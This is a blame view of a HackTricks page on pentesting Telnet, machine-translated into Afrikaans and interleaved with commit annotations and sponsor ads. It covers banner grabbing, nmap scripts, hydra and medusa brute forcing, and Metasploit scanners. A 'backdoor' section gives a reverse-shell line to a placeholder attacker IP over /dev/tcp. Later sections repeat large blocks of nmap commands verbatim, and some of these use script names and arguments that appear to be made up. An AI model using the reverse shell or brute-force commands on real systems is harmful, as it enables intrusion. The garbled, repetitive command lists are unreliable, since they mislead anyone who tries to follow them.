Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-telnet.md

318 lines
12 KiB
Markdown
Raw Normal View History

GitBook: [#3160] No subject
2022-05-01 13:25:53 +00:00
# 23 - Pentesting Telnet
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
arte
2024-01-02 18:28:27 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
GITBOOK-3884: change request with no subject merged in GitBook
2023-04-30 21:54:03 +00:00
</details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
pentest-tools
2024-01-11 13:23:18 +00:00
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Onmiddellik beskikbare opset vir kwetsbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
pentest-tools
2024-01-11 13:23:18 +00:00
{% embed url="https://pentest-tools.com/" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## **Basiese Inligting**
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Telnet is 'n netwerkprotokol wat gebruikers 'n ONbeveiligde manier bied om toegang tot 'n rekenaar oor 'n netwerk te verkry.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Verstekpoort:** 23
GitBook: [#3160] No subject
2022-05-01 13:25:53 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
23/tcp open telnet
```
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
### **Banner Gaping**
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Banner Gaping is 'n tegniek wat gebruik word om inligting oor 'n bediener of diens te bekom deur die banner te ondersoek wat deur die bediener gestuur word wanneer 'n verbindig daarmee gemaak word. Hierdie banner bevat dikwels nuttige inligting soos die bediener se weergawe, die gebruikte sagteware, en selfs moontlike kwesbaarhede.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Om banner gaping uit te voer, kan jy 'n telnet-kliënt gebruik om 'n verbindig met die bediener te maak en die banner te ondersoek wat deur die bediener teruggestuur word. Hier is 'n voorbeeld van hoe om dit te doen:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```bash
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
telnet <target_ip> <port>
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Vervang `<target_ip>` met die IP-adres van die teikenbediener en `<port>` met die poortnommer waarop die diens loop. As jy suksesvol verbind, sal jy die banner sien wat deur die bediener teruggestuur word.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Dit is belangrik om te onthou dat sommige bedieners die bannerinligting kan verberg of vervals om te voorkom dat dit deur aanvallers gebruik word. Daarom is dit noodsaaklik om ander tegnieke vir inligtingversameling te gebruik om 'n vollediger prentjie van die teikenbediener te kry.
```bash
nc -vn <IP> 23
```
Alle interessante opsporing kan uitgevoer word deur **nmap**:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Die skrip `telnet-ntlm-info.nse` sal NTLM-inligting (Windows-weergawes) verkry.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Volgens die [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In die TELNET-protokol is daar verskeie "**opsies**" wat toegelaat sal word en gebruik kan word met die "**DO, DON'T, WILL, WON'T**" struktuur om 'n gebruiker en bediener in staat te stel om ooreen te kom om 'n meer ingewikkelde (of dalk net 'n ander) stel konvensies vir hul TELNET-verbinding te gebruik. Sulke opsies kan die karakterstel, die echo-modus, ens. insluit.
a
2024-02-08 03:08:28 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Ek weet dit is moontlik om hierdie opsies op te som, maar ek weet nie hoe nie, so laat weet my as jy weet hoe.**
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
GitBook: [#3160] No subject
2022-05-01 13:25:53 +00:00
### [Brute force](../generic-methodologies-and-resources/brute-force.md#telnet)
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## Konfigurasie-lêer
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```bash
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
```
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## HackTricks Outomatiese Opdragte
### Telnet
#### Telnet Skandeerder
Die volgende opdragte kan gebruik word om 'n telnet-diens te skandeer:
```plaintext
nmap -p 23 --script telnet-brute <target>
```
#### Telnet Agterdeur
As jy toegang het tot 'n telnet-diens, kan jy probeer om 'n agterdeur te plaas deur die volgende opdrag uit te voer:
```plaintext
echo "sh -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1" | telnet <target>
```
#### Telnet Wagwoorde
As jy 'n wagwoord wil kraak vir 'n telnet-diens, kan jy die volgende opdragte gebruik:
```plaintext
hydra -l <username> -P <wordlist> <target> telnet
```
```plaintext
medusa -u <username> -P <wordlist> -h <target> -M telnet
```
#### Telnet Skakelaar
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
As jy 'n telnet-skakelaar wil gebruik, kan jy die volgende opdragte gebruik:
```plaintext
telnet <target>
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
```plaintext
telnet <target> <port>
```
#### Telnet Verbindingslekkasies
As jy wil kyk vir moontlike verbindingslekkasies in 'n telnet-diens, kan jy die volgende opdragte gebruik:
```plaintext
netstat -ant | grep ":23"
```
```plaintext
ss -ant | grep ":23"
```
```plaintext
lsof -i :23
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=<username> <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=<username> <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=<username>,telnet-encryption-bypass.password=<password> <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=<username>,telnet-ntlm-info.password=<password> <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=<username>,telnet-encryption-bypass.password=<password>,telnet-encryption-bypass.domain=<domain> <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=<username>,telnet-ntlm-info.password=<password>,telnet-ntlm-info.domain=<domain> <target>
```
#### Telnet Skakelaarlekkasies
As jy wil kyk vir moontlike skakelaarlekkasies in 'n telnet-diens, kan jy die volgende opdragte gebruik:
```plaintext
nmap -p 23 --script telnet-brute <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=<username> <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=<username> <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=<username>,telnet-encryption-bypass.password=<password> <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=<username>,telnet-ntlm-info.password=<password> <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=<username>,telnet-encryption-bypass.password=<password>,telnet-encryption-bypass.domain=<domain> <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=<username>,telnet-ntlm-info.password=<password>,telnet-ntlm-info.domain=<domain> <target>
```
#### Telnet Verbindingslekkasies
As jy wil kyk vir moontlike verbindingslekkasies in 'n telnet-diens, kan jy die volgende opdragte gebruik:
```plaintext
netstat -ant | grep ":23"
```
```plaintext
ss -ant | grep ":23"
```
```plaintext
lsof -i :23
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=<username> <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=<username> <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=<username>,telnet-encryption-bypass.password=<password> <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=<username>,telnet-ntlm-info.password=<password> <target>
```
```plaintext
nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=<username>,telnet-encryption-bypass.password=<password>,telnet-encryption-bypass.domain=<domain> <target>
```
```plaintext
nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=<username>,telnet-ntlm-info.password=<password>,telnet-ntlm-info.domain=<domain> <target>
```
GitBook: [#3160] No subject
2022-05-01 13:25:53 +00:00
```
HAC telnet
2021-08-12 13:37:00 +00:00
Protocol_Name: Telnet #Protocol Abbreviation if there is one.
Port_Number: 23 #Comma separated if there is more than one.
Protocol_Description: Telnet #Protocol Abbreviation Spelled out
23 Yaml
2021-08-15 17:54:03 +00:00
Entry_1:
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Name: Notes
Description: Notes for t=Telnet
Note: |
wireshark to hear creds being passed
tcp.port == 23 and ip.addr != myip
23 Yaml
2021-08-15 17:54:03 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-telnet
23 Yaml
2021-08-15 17:54:03 +00:00
Entry_2:
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Name: Banner Grab
Description: Grab Telnet Banner
Command: nc -vn {IP} 23
23 Yaml
2021-08-15 17:54:03 +00:00
Entry_3:
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Name: Nmap with scripts
Description: Run nmap scripts for telnet
Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}
TireFire Telnet Syntax Update TireFire Telnet Syntax Update
2022-07-01 13:10:24 +00:00
Entry_4:
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Name: consoleless mfs enumeration
Description: Telnet enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
GitBook: [master] 7 pages and 16 assets modified
2021-08-14 09:02:12 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
```
pentest-tools
2024-01-11 13:23:18 +00:00
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
pentest-tools
2024-01-11 13:23:18 +00:00
{% embed url="https://pentest-tools.com/" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
GITBOOK-3884: change request with no subject merged in GitBook
2023-04-30 21:54:03 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
arte
2024-01-02 18:28:27 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Reference in a new issue Copy permalink